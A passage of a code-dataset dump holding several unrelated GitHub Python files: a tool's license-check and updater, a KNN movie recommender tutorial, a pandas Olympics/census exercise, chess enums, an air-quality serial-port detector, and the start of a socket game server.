필요합니다.\\nNeed to update Follow Maker v{}'.format(strVer)\n else:\n bResult = False\n errCode = ERROR_UNIDENTIFIED_USER\n errMsg = '등록되지 않은 사용자 확인\\nUnidentified User'\n\n driver.quit()\n return bResult, errCode, errMsg\n\ndef apply_use(macId, driverPath):\n bResult = True\n errCode = ERROR_NONE\n errMsg = '프로그램 사용 신청 완료'\n # 크롬창을 띄우지 않는 옵션을 넣는다\n options = get_chrome_options()\n try:\n driver = webdriver.Chrome(driverPath, options=options)\n\n except WebDriverException as exc:\n bResult = False\n errCode = 1\n errMsg = 'ensure chromedriver is installed at {}'.format(driverPath)\n return bResult, errCode, errMsg\n\n driver.implicitly_wait(3)\n url_apply = 'https://antistereotypes.tistory.com/25'\n driver.get(url_apply)\n time.sleep(3)\n\n # div class: input - group\n driver.find_element_by_xpath('//*[@id=\"entry25password\"]').send_keys(APPLY_PW)\n driver.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/form/fieldset/button').click()\n driver.implicitly_wait(3)\n\n now = time.localtime()\n pw_now = \"pw%02d%02d%02d\" % (now.tm_hour, now.tm_min, now.tm_sec)\n comment_now = \"[%04d-%02d-%02d %02d:%02d:%02d] %s 등록 완료\" % (now.tm_year, now.tm_mon, now.tm_mday,\n now.tm_hour, now.tm_min, now.tm_sec, macId)\n driver.find_element_by_xpath('//*[@id=\"entry25Comment\"]/div/form/div/div[1]/input[1]').send_keys('신청 댓글')\n driver.find_element_by_xpath('//*[@id=\"entry25Comment\"]/div/form/div/div[1]/input[2]').send_keys(pw_now)\n driver.find_element_by_xpath('//*[@id=\"entry25Comment\"]/div/form/div/div[1]/div/label').click()\n driver.implicitly_wait(3)\n driver.find_element_by_xpath('//*[@id=\"entry25Comment\"]/div/form/div/textarea').send_keys(comment_now)\n driver.find_element_by_xpath('//*[@id=\"entry25Comment\"]/div/form/div/div/button').click()\n time.sleep(3)\n driver.quit()\n\n return bResult, errCode, errMsg\n\ndef get_notification(driverPath):\n bResult = True\n errCode = ERROR_NONE\n errMsg = 'None'\n # 크롬창을 띄우지 않는 옵션을 넣는다\n options = get_chrome_options()\n\n try:\n driver = webdriver.Chrome(driverPath, options=options)\n\n except WebDriverException as exc:\n bResult = False\n errCode = 1\n errMsg = 'ensure chromedriver is installed at {}'.format(driverPath)\n return bResult, errCode, errMsg\n\n driver.implicitly_wait(3)\n url_apply = 'https://antistereotypes.tistory.com/26'\n driver.get(url_apply)\n time.sleep(3)\n\n # div class: input - group\n driver.find_element_by_xpath('//*[@id=\"entry26password\"]').send_keys(NOTY_PW)\n driver.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/form/fieldset/button').click()\n driver.implicitly_wait(3)\n\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n\n strNotiDiv = soup.find('div', {'class': 'entry-content'})\n strNoti = ''\n for noti in strNotiDiv:\n strNoti += re.sub('<.+?>', '', str(noti))\n strNoti += '\\n'\n\n if bResult and strNoti != '':\n errMsg = strNoti\n\n time.sleep(3)\n driver.quit()\n\n return bResult, errCode, errMsg\n\ndef get_chrome_options():\n options = webdriver.ChromeOptions()\n options.add_argument('--mute-audio')\n options.add_argument('--dns-prefetch-disable')\n options.add_argument('--lang=en-US')\n options.add_argument('--disable-setuid-sandbox')\n options.add_argument('--headless')\n options.add_argument('--disable-gpu')\n\n return options\n\ndef get_mac_address():\n arrinfo = {}\n isdevice = 0\n mk = 0\n if sys.platform=='win32':\n for line in os.popen(\"ipconfig /all\"):\n if line.lstrip().startswith('호스트'):\n host = line.split(':')[1].strip()\n arrinfo[\"host\"] = host\n else:\n if line.lstrip().startswith('터널'):\n isdevice = 0\n if line.lstrip().startswith('이더넷'):\n isdevice = 1\n if line.lstrip().startswith('무선'):\n isdevice = 1\n if isdevice == 1:\n if line.lstrip().startswith('미디어 상태'):\n desc = line.split(':')[1].strip()\n if desc == '미디어 연결 끊김':\n isdevice = 0\n if line.lstrip().startswith('설명'):\n desc = line.split(':')[1].strip()\n if desc.lstrip().startswith('Bluetooth'):\n isdevice = 0\n if line.lstrip().startswith('물리적'):\n #mac = line.split(':')[1].strip().replace('-',':')\n mac = line.split(':')[1].strip()\n arrinfo[mk] = mac\n isdevice = 0\n mk+=1\n else:\n for line in os.popen(\"/sbin/ifconfig\"):\n if line.find('Ether') >-1:\n mac=line.split()[4]\n arrinfo[mk] = mac\n isdevice = 0\n mk+=1\n return arrinfo\n\ndef download_file_from_google_drive(id, destination):\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = requests.Session()\n\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n save_response_content(response, destination)\n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n\ndef downlaod_updatefile(driverPath):\n bResult = True\n errCode = ERROR_NONE\n errMsg = ''\n # 크롬창을 띄우지 않는 옵션을 넣는다\n options = get_chrome_options()\n try:\n driver = webdriver.Chrome(driverPath, options=options)\n\n except WebDriverException as exc:\n bResult = False\n errCode = 1\n errMsg = 'ensure chromedriver is installed at {}'.format(driverPath)\n return bResult, errCode, errMsg\n\n url_update = 'https://antistereotypes.tistory.com/23'\n driver.get(url_update)\n time.sleep(3)\n\n # div class: input - group\n driver.find_element_by_xpath('//*[@id=\"entry23password\"]').send_keys(UPDATE_PW)\n driver.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/form/fieldset/button').click()\n\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n\n strIniList = soup.find('div', {'class': 'entry-content'})\n\n strUrl = ''\n for ini in strIniList:\n strIni = re.sub('<.+?>', '', str(ini))\n if not strIni.find('PGM_UPDATE_URL') == -1:\n strUrl = strIni[strIni.find('=')+1:]\n\n if not strUrl == '':\n file_id = strUrl\n downloadedFile = (\"%s\\\\Downloads\\\\followerMaker.zip\") % expanduser(\"~\")\n download_file_from_google_drive(file_id, downloadedFile)\n\n time.sleep(3)\n\n else:\n bResult = False\n errCode = ERROR_FAIL_TO_GET_URL\n errMsg = '업데이트 URL이 없습니다. 관리자에게 문의해주세요.'\n\n driver.quit()\n\n return bResult, errCode, errMsg","repo_name":"Velvet2045/follower-maker","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":10412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38532368381","text":"# Write an algorithm to find the greatest among two different numbers entered by the user.\r\nnum1 = int(input(\"Enter first number: \"))\r\nnum2 = int(input(\"Enter second number: \"))\r\n\r\n# Input Validation\r\nif num1 >= 0 and num1 <= 100:\r\n print('>>> Input 1 is a Valid Input')\r\nif num2 >= 0 and num2 <= 100:\r\n print('>>> Input 2 is a Valid Input')\r\n \r\n# Compare both the number\r\nif num1>num2:\r\n print(num1,\" = [1st Number] is the largest number.\")\r\nelse:\r\n print(num2,\" = [2nd Number] is the largest number.\")\r\n\r\n","repo_name":"MohammedA-04/SDD_Python","sub_path":"Week 2/4A.py","file_name":"4A.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17011163083","text":"\"\"\"\nBasic Collaborative Filtering Tutorial (K-means)\n\nThis tutorial is based on\nhttps://heartbeat.fritz.ai/recommender-systems-with-python-part-ii-collaborative-filtering-k-nearest-neighbors-algorithm-c8dcd5fd89b2\n\"\"\"\n\nimport os\nimport pandas as pd\nimport pathlib\nfrom scipy.sparse import csr_matrix\nfrom sklearn.neighbors import NearestNeighbors\nfrom fuzzywuzzy import fuzz\n\n\n# Load data\nmovies_filename = \"movie.csv\"\nratings_filename = \"rating.csv\"\ndata_path = os.path.join(\n pathlib.Path(__file__).parent.absolute(),\n \"../../../data/examples\"\n)\n\ndf_movies = pd.read_csv(\n os.path.join(data_path, movies_filename),\n usecols=[\"movieId\", \"title\"],\n dtype={\"movieId\": \"int32\", \"title\": \"str\"}\n)\ndf_ratings = pd.read_csv(\n os.path.join(data_path, ratings_filename),\n usecols=[\"userId\", \"movieId\", \"rating\"],\n dtype={\"userId\": \"int32\", \"movieId\": \"int32\", \"rating\": \"float32\"}\n)\n\n# Only take first 10000 to make this example faster\ndf_ratings = df_ratings[:100000]\n\nprint(\"========= MOVIES DF =========\")\nprint(\"MOVIES DF HEAD\\n\", df_movies.head(), end=\"\\n\\n\")\nprint(\"MOVIES DF SHAPE\", df_movies.shape, end=\"\\n\\n\")\n\nprint(\"========= RATINGS DF =========\")\nprint(\"RATINGS DF HEAD\\n\", df_ratings.head(), end=\"\\n\\n\")\nprint(\"RATINGS DF SHAPE\", df_ratings.shape, end=\"\\n\\n\")\n\n\n# Most of the movies in the dataset do not have any rating,\n# so we will only take in account those users\n# that have rated more than 5 movies\npopularity_thres = 5\ndf_movies_cnt = pd.DataFrame(\n df_ratings.groupby(\"movieId\").size(),\n columns=[\"count\"]\n)\npopular_movies = list(\n set(df_movies_cnt.query(\"count >= @popularity_thres\").index\n ))\ndf_ratings_drop_movies = df_ratings[df_ratings.movieId.isin(popular_movies)]\nprint(\"shape of original ratings data: \", df_ratings.shape)\nprint(\n \"shape of ratings data after dropping unpopular movies: \",\n df_ratings_drop_movies.shape\n)\n\n# Similarly, we only take into account those movies that have been rated\n# more than 5 times\nratings_thres = 5\ndf_users_cnt = pd.DataFrame(\n df_ratings_drop_movies.groupby(\"userId\").size(),\n columns=[\"count\"]\n)\nactive_users = list(set(df_users_cnt.query(\"count >= @ratings_thres\").index))\ndf_ratings_drop_users = df_ratings_drop_movies[\n df_ratings_drop_movies.userId.isin(active_users)\n]\nprint(\"shape of original ratings data: \", df_ratings.shape)\nprint(\n \"shape of ratings data after dropping unpopular/inactive movies/users: \",\n df_ratings_drop_users.shape\n)\n\n\n# RATING MATRIX\n# Pivot ratings into movie features to get a rating matrix\n# Each movie is a row and each user is a colum, values are ratings\n# 0 indicates no rating\nmovie_user_mat = df_ratings_drop_movies.pivot(\n index=\"movieId\",\n columns=\"userId\",\n values=\"rating\"\n).fillna(0)\n\nprint(\"========= MOVIE FEATURES DF =========\")\nprint(\"MOVIE FEATURES DF HEAD\\n\", movie_user_mat.head(), end=\"\\n\\n\")\nprint(\"MOVIE FEATURES DF SHAPE\", movie_user_mat.shape, end=\"\\n\\n\")\n\n# Because many values are zero (the matrix is extremely sparse),\n# we convert the matrix into a Compressed Sparse Matrix for better efficiency:\n# https://docs.scipy.org/doc/scipy-0.18.1/reference/generated/scipy.sparse.csr_matrix.html\nmovie_user_mat_sparse = csr_matrix(movie_user_mat.values)\n\n# We also need a map of movie titles to ids for pretty printing\nmovies_list = list(\n df_movies.set_index(\"movieId\").loc[movie_user_mat.index].title\n)\nmovie_to_idx = {\n movie: i for i, movie in enumerate(movies_list)\n}\n\n\n# Fit the Knn classifier\nmodel_knn = NearestNeighbors(\n metric=\"cosine\",\n algorithm=\"brute\",\n n_neighbors=20,\n n_jobs=-1\n)\nprint(\"Training........\")\nmodel_knn.fit(movie_user_mat_sparse)\n\n\ndef make_recommendation(model_knn, data, mapper, fav_movie, n_recommendations):\n \"\"\"\n return top n similar movie recommendations based on user\"s input movie\n Parameters\n ----------\n model_knn: sklearn model, knn model\n data: movie-user matrix\n mapper: dict, map movie title name to index of the movie in data\n fav_movie: str, name of user input movie\n n_recommendations: int, top n recommendations\n Return\n ------\n list of top n similar movie recommendations\n \"\"\"\n # fit\n model_knn.fit(data)\n # get input movie index\n print(\"You have input movie:\", fav_movie)\n idx = fuzzy_matching(mapper, fav_movie, verbose=True)\n\n print(\"Recommendation system start to make inference\")\n print(\"......\\n\")\n distances, indices = model_knn.kneighbors(\n data[idx], n_neighbors=n_recommendations+1)\n\n raw_recommends = sorted(list(zip(indices.squeeze().tolist(\n ), distances.squeeze().tolist())), key=lambda x: x[1])[:0:-1]\n # get reverse mapper\n reverse_mapper = {v: k for k, v in mapper.items()}\n # print recommendations\n print(\"Recommendations for {}:\".format(fav_movie))\n for i, (idx, dist) in enumerate(raw_recommends):\n print(\"{0}: {1}, with distance of {2}\".format(\n i+1, reverse_mapper[idx], dist))\n\n\ndef fuzzy_matching(mapper, fav_movie, verbose=True):\n \"\"\"\n return the closest text match via fuzzy ratio.\n\n Parameters\n ----------\n mapper: dict, map movie title name to index of the movie in data\n fav_movie: str, name of user input movie\n\n verbose: bool, print log if True\n Return\n ------\n index of the closest match\n \"\"\"\n match_tuple = []\n # get match\n for title, idx in mapper.items():\n ratio = fuzz.ratio(title.lower(), fav_movie.lower())\n if ratio >= 60:\n match_tuple.append((title, idx, ratio))\n # sort\n match_tuple = sorted(match_tuple, key=lambda x: x[2])[::-1]\n if not match_tuple:\n print(\"Oops! No match is found\")\n return\n if verbose:\n print(\"Found possible matches in our database: {0}\\n\".format(\n [x[0] for x in match_tuple]))\n return match_tuple[0][1]\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Test the recommendation model:\n K-nn has issues:\n * popularity bias\n * item cold-start: new movies won't have ratings,\n hence won't be recommended\n * scalability: most of the values in the ratings(movie-user)\n sparse matrix will be 0, which is a waste of space.\n \"\"\"\n my_favorite = \"Toy Story\"\n\n make_recommendation(\n model_knn=model_knn,\n data=movie_user_mat_sparse,\n fav_movie=my_favorite,\n mapper=movie_to_idx,\n n_recommendations=10\n )\n","repo_name":"jramcast/music-recommender","sub_path":"recommender/app/commands/run_collaborative_knn_recommendation_example.py","file_name":"run_collaborative_knn_recommendation_example.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42598459397","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 5 17:33:59 2020\n\n@author: grael\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport os\n\n\nroot = '/Users/grael/hackathon_data'\n\nnbr1 = pd.read_csv(os.path.join(root, 'Neighbors_new_features_1.csv'), index_col=0)\nnbr2 = pd.read_csv(os.path.join(root, 'Neighbors_new_features_2.csv'), index_col=0)\nnbr3 = pd.read_csv(os.path.join(root, 'Neighbors_new_features_3.csv'), index_col=0)\n\n\n\nplt.figure()\nsns.clustermap(nbr1.corr(), center=0)\nplt.show()\n\n\nmorphological_features = ['Area',\n 'Eccentricity',\n 'Solidity',\n 'Extent',\n 'EulerNumber',\n 'Perimeter',\n 'MajorAxisLength',\n 'MinorAxisLength',\n 'Orientation',\n 'X_position',\n 'Y_position',\n 'mean_intensity',\n 'std_intensity']\n\nshort_features = [c for c in nbr1.columns if ((\n ('Area' in c) or ('mean_' in c) or ('std' in c)\n or ('AxisLength' in c) or ('Perimeter' in c) or\n ('Eccentricity' in c) or ('Extent' in c)) and ('_1' in c))]\n\nplt.figure()\nsns.clustermap(nbr1[short_features].corr(), center=0)\nplt.show()\n\n\n\n# orientation_features = [c for c in nbr1.columns if ('Orientation' in c)]\n\n# odf1 = nbr1[orientation_features].T.corr().T\n# odf2 = nbr2[orientation_features].T.corr().T\n# odf3 = nbr3[orientation_features].T.corr().T\n\n\n# nbr1['OrientationCorrelation'] = odf1\n# nbr2['OrientationCorrelation'] = odf2\n# nbr3['OrientationCorrelation'] = odf3\n\n\nsave_features = [c for c in nbr1.columns if ((\n ('Area' in c) or ('mean_' in c) or ('std' in c)\n or ('AxisLength' in c) or ('Perimeter' in c) or\n ('Eccentricity' in c) or ('Extent' in c) or ('Solidity' in c))\n # or ('OrientationCorrelation' in c)\n )]\n\nnbr1[save_features].to_csv(os.path.join(root, 'Lung1_neighborhood_features.csv'), header=True)\nnbr2[save_features].to_csv(os.path.join(root, 'Lung2_neighborhood_features.csv'), header=True)\nnbr3[save_features].to_csv(os.path.join(root, 'Lung3_neighborhood_features.csv'), header=True)","repo_name":"IAWG-CSBC-PSON/morpho-type","sub_path":"Elliot/vanderbilt_hackathon_extra_features.py","file_name":"vanderbilt_hackathon_extra_features.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24221207742","text":"\n# The following code loads the olympics dataset (olympics.csv), which was derrived from the Wikipedia entry on\n# [All Time Olympic Games Medals](https://en.wikipedia.org/wiki/All-time_Olympic_Games_medal_table), and does some basic data cleaning. \n# \n# The columns are organized as # of Summer games, Summer medals, # of Winter games, Winter medals, total # number of games,\n# total # of medals. \n\nimport pandas as pd\n\ndf = pd.read_csv('olympics.csv', index_col=0, skiprows=1)\n\nfor col in df.columns:\n if col[:2]=='01':\n df.rename(columns={col:'Gold'+col[4:]}, inplace=True)\n if col[:2]=='02':\n df.rename(columns={col:'Silver'+col[4:]}, inplace=True)\n if col[:2]=='03':\n df.rename(columns={col:'Bronze'+col[4:]}, inplace=True)\n if col[:1]=='№':\n df.rename(columns={col:'#'+col[1:]}, inplace=True)\n\nnames_ids = df.index.str.split('\\s\\(') # split the index by '('\n\ndf.index = names_ids.str[0] # the [0] element is the country name (new index) \ndf['ID'] = names_ids.str[1].str[:3] # the [1] element is the abbreviation or ID (take first 3 characters from that)\n\ndf = df.drop('Totals')\ndf\n\n# ### Question 0\n\n# What is the first country in df?\n\ndef answer_zero():\n # This function returns the row for Afghanistan, which is a Series object.\n return df.iloc[0]\nanswer_zero() \n\n\n# ### Question 1\n\n# Which country has won the most gold medals in summer games?\n# \n# *This function should return a single string value.*\n\n\ndef answer_one(): \n return df.Gold.idxmax()\nanswer_one()\n\n\n\n# ### Question 2\n\n# Which country had the biggest difference between their summer and winter gold medal counts?\n# \n# *This function should return a single string value.*\n\ndef answer_two():\n return ( df['Gold'] - df['Gold.1']).idxmax()\n #return (df.Gold - df.(Gold.1) ).idxmax() #\"YOUR ANSWER HERE\"\n#answer_two()\n\n\n\n# ### Question 3\n\n# Which country has the biggest difference between their summer gold medal counts and winter gold medal counts relative to their total gold medal count? \n# \n# $$\\frac{Summer~Gold - Winter~Gold}{Total~Gold}$$\n# \n# Only include countries that have won at least 1 gold in both summer and winter.\n# \n# *This function should return a single string value.*\n\ndef answer_three():\n temp = df[ df.Gold > 0]\n temp = temp[ temp['Gold.1'] > 0]\n return ( ( temp['Gold'] - temp['Gold.1'])/ ( temp['Gold'] + temp['Gold.1'])).idxmax()\n #temp = temp[ temp.Gold.1 > 0]\n #return ( ( temp.Gold - temp.Gold.1)/ ( temp.Gold + temp.Gold.1)).idxmax() #\"YOUR ANSWER HERE\"\n\nanswer_three()\n#df.columns\n\n\n# ### Question 4\n\n# Write a function that creates a Series called \"Points\" which is a weighted value where each gold medal (`Gold.2`) counts for 3 points, silver medals (`Silver.2`) for 2 points, and bronze medals (`Bronze.2`) for 1 point. The function should return only the column (a Series object) which you created, with the country names as indices.\n# \n# *This function should return a Series named `Points` of length 146*\n\n\ndef answer_four():\n# for i in df :\n# print (i)\n \n Points = df['Gold.2'] *3 + df['Silver.2']*2 + df['Bronze.2'] \n #print (type(Points) )\n return Points \nanswer_four()\n\n\n# ## Part 2\n# For the next set of questions, we will be using census data from the [United States Census Bureau](http://www.census.gov).\n# Counties are political and geographic subdivisions of states in the United States.\n# This dataset contains population data for counties and states in the US from 2010 to 2015.\n# [ See this document](https://www2.census.gov/programs-surveys/popest/technical-documentation/file-layouts/2010-2015/co-est2015-alldata.pdf) for a description of the variable names.\n# \n\n\ncensus_df = pd.read_csv('census.csv')\ncensus_df\n#census_df.columns\n#census_df.describe\n\n\n\n# ### Question 5\n\n# Which state has the most counties in it? \n# \n# *This function should return a single string value.*\n\ndef answer_five() :\n temp = census_df[census_df.SUMLEV == 50 ]\n temp = temp.groupby(\"STNAME\").count()[\"CTYNAME\"]\n return temp.idxmax()\n\n\n\n# ### Question 6\n\n# **Only looking at the three most populous counties for each state**, what are the three most populous states (in order of highest population to lowest population)? Use `CENSUS2010POP`.\n# \n# *This function should return a list of string values.*\n\n\n#def answer_six() :\n# temp = census_df[ census_df['SUMLEV'] == 50 ]\n# #temp = census_df.sort_values( by = 'CENSUS2010POP' , ascending = False)\n# temp = temp.sort_values( by = 'CENSUS2010POP' , ascending = False)\n# temp = temp.groupby('STNAME')\n# #list( temp)\n# #list.reverse(temp)\n# return list (temp.head(3)['STNAME'] )[ : 3]\n#answer_six()\ndef answer_six() :\n temp = census_df.groupby('STNAME')['CENSUS2010POP'].nlargest(3).sum(level = 0)\n \n tt = []\n for x in temp[0 : 3].keys() :\n tt.append( x)\n# print(type(tt) )\n# return tt\n #print (set(temp.keys().unique()[:3] ) )\n return temp[0 : 3].keys().tolist() #working correct but returning object which is not required here\nanswer_six()\n\n\n\n# ### Question 7\n\n# Which county has had the largest absolute change in population within the period 2010-2015? (Hint: population values are stored in columns POPESTIMATE2010 through POPESTIMATE2015, you need to consider all six columns.)\n# \n# e.g. If County Population in the 5 year period is 100, 120, 80, 105, 100, 130, then its largest change in the period would be |130-80| = 50.\n# \n# *This function should return a single string value.*\n\ndef answer_seven() :\n temp = census_df[ census_df['SUMLEV'] == 50]\n temp = temp.set_index(['CTYNAME'])\n# print(temp.ndim )\n column = ['POPESTIMATE2010', 'POPESTIMATE2011', 'POPESTIMATE2012', 'POPESTIMATE2013', 'POPESTIMATE2014', 'POPESTIMATE2015' ]\n temp_max = temp[column].max(axis = 1)\n temp_min = temp[column].min(axis = 1)\n temp_diff = temp_max - temp_min\n# print( type(temp_diff))\n# print( temp_diff.idxmax() )\n\n return ( temp_diff.idxmax() )\n \n\n# ### Question 8\n# In this datafile, the United States is broken up into four regions using the \"REGION\" column. \n# \n# Create a query that finds the counties that belong to regions 1 or 2, whose name starts with 'Washington', and whose POPESTIMATE2015 was greater than their POPESTIMATE 2014.\n# \n# *This function should return a 5x2 DataFrame with the columns = ['STNAME', 'CTYNAME'] and the same index ID as the census_df (sorted ascending by index).*\n\ndef answer_eight():\n filter1 = (census_df['CTYNAME'].str.startswith('Washington') )\n filter2 = ( census_df['POPESTIMATE2015'] > census_df['POPESTIMATE2014'] )\n sel_col = ['STNAME' , 'CTYNAME'] \n temp = census_df [ filter1 & filter2 ]\n temp\n reg1 = temp['REGION'] == 1 \n reg2 = temp['REGION'] == 2 \n reg = temp[ reg1 | reg2 ][ sel_col]\n# print( reg1.head(5))\n# temp = temp.set_index(['STNAME'])\n# print ( temp['STNAME'].unique())\n# print( temp)\n return reg\n","repo_name":"poojag01/Pandas-and-Numpy-usage-on-Datasets","sub_path":"Olmypics and Census data work/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9394861260","text":"import enum\n\nBOARD_SIZE = 8\n\nPlayerType = enum.Enum('PlayerType', 'Black White', start = 3 , module=__name__)\n\nclass PieceType(enum.Enum):\n Rook = enum.auto()\n Knight = enum.auto()\n Bishop = enum.auto()\n Queen = enum.auto()\n King = enum.auto()\n Pawn = enum.auto()\n\nMovementBehavior = enum.Enum('MovementBehavior', 'AcrossMove DiagonalMove KnightMove QueenMove KingMove PawnMove' , start = 1, module=__name__)\n\n'''\n * There are 4 diagonal scenarios from any particular location.\n * namely: ++, --, +-, -+\n '''\nCellDiagonalMovements = enum.Enum('CellDiagonalMovements', 'PP MM PM MP', start = 1 , module=__name__)\n\n##############################################################\ndef UT1():\n print(list(PlayerType))\n print(list(PieceType))\n print(list(MovementBehavior))\n##############################################################\n\nif __name__ == '__main__': \n UT1()","repo_name":"snehasys/repo1","sub_path":"Chess_Project/Enumerators.py","file_name":"Enumerators.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8647296811","text":"from __future__ import print_function\nfrom pyvantagepro import VantagePro2\nfrom mysql.connector.constants import ClientFlag\nimport mysql.connector\nimport sys\nimport serial\nimport time\nimport subprocess\nimport glob\n\ntry:\n mydb = mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"root\",database=\"trusur_aqm\")\n mycursor = mydb.cursor()\n \nexcept Exception as e: \n print(\"[X] \" + e)\n\nmycursor.execute(\"UPDATE aqm_configuration SET content='' WHERE data LIKE 'com_pm10'\")\nmydb.commit()\nmycursor.execute(\"UPDATE aqm_configuration SET content='' WHERE data LIKE 'com_pm25'\")\nmydb.commit()\nmycursor.execute(\"UPDATE aqm_configuration SET content='' WHERE data LIKE 'com_hc'\")\nmydb.commit()\nmycursor.execute(\"UPDATE aqm_configuration SET content='' WHERE data LIKE 'com_ws'\")\nmydb.commit()\n\ndef serial_ports():\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = []\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result.append(port)\n except (OSError, serial.SerialException):\n pass\n return result\n \ndef check_as_arduino(port):\n try:\n COM = serial.Serial()\n COM.port = port\n COM.baudrate = 9600\n COM.timeout = 3\n COM.open()\n retval = str(COM.readline())\n\n if(retval.count(\"000.\") > 0 and retval.count(\",+\") > 0 and retval.count(\",*\") > 0):\n mycursor.execute(\"UPDATE aqm_configuration SET content='\" + port + \"' WHERE (data LIKE 'com_pm10' OR data LIKE 'com_pm25') AND content='' LIMIT 1\")\n mydb.commit()\n print(\" ==> PM\")\n \n if(int(retval.replace(\"b'\",\"\").replace(\"\\\\r\\\\n'\",\"\")) >= 0 and int(retval.replace(\"b'\",\"\").replace(\"\\\\r\\\\n'\",\"\")) <= 60000):\n mycursor.execute(\"UPDATE aqm_configuration SET content='\" + port + \"' WHERE data LIKE 'com_hc' AND content='' LIMIT 1\")\n mydb.commit()\n print(\" ==> HC\")\n except Exception as e: \n None\n \ndef check_as_ventagepro2(port):\n try:\n COM_WS = VantagePro2.from_url(\"serial:%s:19200:8N1\" % (port))\n ws_data = COM_WS.get_current_data()\n WS = ws_data.to_csv(';',False)\n mycursor.execute(\"UPDATE aqm_configuration SET content='\" + port + \"' WHERE data LIKE 'com_ws' AND content='' LIMIT 1\")\n mydb.commit() \n print(\" ==> VANTAGEPRO2\")\n except Exception as e:\n None\n \nmycursor.execute(\"TRUNCATE TABLE serial_ports\")\nmydb.commit()\nfor port in serial_ports():\n print(\"Adding port \" + port)\n port_desc = \"\"\n\n if sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n p = subprocess.Popen('dmesg | grep ' + str(port).replace('/dev/','') + ' | tail -1', stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n p_status = p.wait()\n port_desc = output.decode(\"utf-8\")\n if \"now attached\" in port_desc:\n try:\n port_desc = port_desc.split(\":\")[1].split(\" now attached\")[0]\n except:\n port_desc = port_desc\n\n print(port_desc)\n try:\n mycursor.execute(\"INSERT INTO serial_ports (port,description) VALUES ('\" + port +\"','\" + port_desc +\"')\")\n mydb.commit()\n except Exception as e: \n None\n \nmycursor.execute(\"SELECT port,description FROM serial_ports ORDER BY port\")\nserial_ports = mycursor.fetchall()\nfor serial_port in serial_ports:\n print(serial_port[0])\n if(str(serial_port[0]).count(\"ttyS\") > 0 or str(serial_port[0]).count(\"ttyUSB\") > 0 or str(serial_port[0]).count(\"ttyPM\") > 0 or str(serial_port[0]).count(\"ttyWS\") > 0 or str(serial_port[0]).count(\"COM\") > 0):\n check_as_ventagepro2(serial_port[0])\n \n mycursor.execute(\"SELECT id FROM aqm_configuration WHERE content LIKE '\"+ serial_port[0] +\"'\")\n try:\n sensor_reader_id = mycursor.fetchone()[0]\n except Exception as e:\n sensor_reader_id = \"\"\n if(str(sensor_reader_id) == \"\"):\n check_as_arduino(serial_port[0])","repo_name":"trusursidik12/aqm_py","sub_path":"auto_seraching.py","file_name":"auto_seraching.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1163560785","text":"num = int(input('Введите число: \\n'))\ncount = 0\nsumm_R = 0\nsumm_L = 0\nwhile num > 10:\n if count < 3:\n summ_R += num % 10\n num //= 10\n else:\n summ_L += num % 10\n num //= 10\n count += 1\nsumm_L += num\nif summ_L ==summ_R:\n print('Билет счастливый')\nelse:\n print('Билет не счастливый')","repo_name":"Robopin/Seminar_Python","sub_path":"HW1_Ex6.py","file_name":"HW1_Ex6.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2791271630","text":"import socket\nimport threading\nimport ssl\nimport datetime\nimport time\n\nfrom game import Game\n\nSERVER = \"127.0.0.1\"\nPORT = 5001\nGAMES = {}\nFORMAT = 'utf-8'\nBUFF_SIZE = 1024\nCLIENTS_COUNTER = 1\n\n\ndef write_to_logs(event):\n file_logs = open(\"logs.txt\", \"a\")\n time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n file_logs.write(f\"{time}: {event} \\n\")\n file_logs.close()\n\n\ndef end_game(game_id: int) -> None:\n if game_id in GAMES:\n game = GAMES[game_id]\n handle_disconnect(game.client_1_sock)\n handle_disconnect(game.client_2_sock)\n del GAMES[game_id]\n\n\ndef 